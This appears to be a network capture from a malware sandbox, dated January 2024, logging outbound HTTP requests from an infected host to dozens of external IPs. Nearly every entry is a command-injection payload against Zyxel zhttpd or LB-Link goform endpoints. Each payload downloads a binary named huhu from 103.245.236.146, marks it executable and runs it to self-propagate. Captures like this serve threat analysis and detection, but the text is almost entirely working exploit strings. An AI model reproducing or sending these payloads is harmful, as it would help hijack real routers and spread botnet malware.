                                                  Jan 19, 2024 18:23:59.130528927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5329192.168.2.133998246.217.190.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.130559921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5330192.168.2.133780658.131.214.156443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.130587101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5331192.168.2.1334808203.227.177.217443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.130620003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5332192.168.2.1344936200.95.123.81443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.130657911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5333192.168.2.1338168182.143.247.96443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.130712032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5334192.168.2.1353664115.233.48.240443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.130760908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5335192.168.2.133399059.220.242.153443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.130809069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5336192.168.2.1353452184.174.245.65443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.130845070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5337192.168.2.134719835.157.136.165443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.130902052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5338192.168.2.1356604157.161.39.115443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.130949020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5339192.168.2.134161291.44.180.202443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.130968094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5340192.168.2.135844659.2.21.104443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.131021023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5341192.168.2.1333942113.111.242.232443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.131057024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5342192.168.2.135884414.73.238.908080
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.794502974 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                  Cookie: user=admin
                                                  Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                  Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                                  Jan 19, 2024 18:24:00.080440044 CET103INHTTP/1.1 404 Not Found
                                                  Content-Type: text/plain
                                                  Content-Length: 30
                                                  Connection: close


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5343192.168.2.135713885.187.227.428080
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.031229019 CET219OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                  Cookie: user=admin
                                                  Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                  Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                                  Jan 19, 2024 18:24:00.268115044 CET323INHTTP/1.1 400 Bad Request
                                                  Server: nginx/1.5.2
                                                  Date: Fri, 19 Jan 2024 19:24:00 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 172
                                                  Connection: close
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 35 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.5.2</center></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5344192.168.2.1346198139.104.184.77443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.141956091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5345192.168.2.1360420197.43.157.55443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.141998053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5346192.168.2.1336904115.121.51.231443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.142044067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5347192.168.2.1332962167.167.129.40443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.142100096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5348192.168.2.1339582142.184.149.114443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.142157078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5349192.168.2.134178041.106.206.50443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.142193079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5350192.168.2.135200259.220.56.240443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.142249107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5351192.168.2.13595804.88.208.241443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.142291069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5352192.168.2.1335966223.234.207.68443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.142323971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5353192.168.2.134853453.251.136.192443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.142385006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5354192.168.2.133806864.185.188.219443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.142437935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5355192.168.2.1357778186.4.30.253443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.142462969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5356192.168.2.1335132176.222.159.139443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.142501116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5357192.168.2.1342022220.183.157.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.142561913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5358192.168.2.133935887.133.180.14443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.142608881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5359192.168.2.134875667.49.118.154443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.142642975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5360192.168.2.1358852106.207.77.40443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.142688990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5361192.168.2.1349790152.106.46.234443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.142723083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5362192.168.2.135169674.73.85.68443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.142764091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5363192.168.2.1346274112.57.61.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.142852068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5364192.168.2.1342256209.53.39.94443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.142900944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5365192.168.2.135594072.103.242.96443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.142935038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5366192.168.2.133800496.252.99.244443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.142977953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5367192.168.2.1344046103.120.59.73443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.143014908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5368192.168.2.1338044153.209.239.155443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.143052101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5369192.168.2.1351760186.32.51.58443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.143095970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5370192.168.2.1342972204.147.64.5443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.143134117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5371192.168.2.134678036.4.120.108443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.143181086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5372192.168.2.1341024119.190.17.30443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.143209934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5373192.168.2.1360302134.28.17.161443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.143250942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5374192.168.2.1340136114.17.216.98443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.143284082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5375192.168.2.134018861.182.105.218443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.143318892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5376192.168.2.135786890.146.6.124443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.143342018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5377192.168.2.134762239.18.161.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.143388987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5378192.168.2.1338702133.239.234.252443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.143418074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5379192.168.2.134841624.42.107.210443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.143456936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5380192.168.2.135999236.189.201.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.143510103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5381192.168.2.1358508168.87.65.251443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.143558979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5382192.168.2.135606887.158.177.244443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.143584967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5383192.168.2.1335670213.219.153.28443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.143636942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5384192.168.2.1345130172.0.180.107443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.143682957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
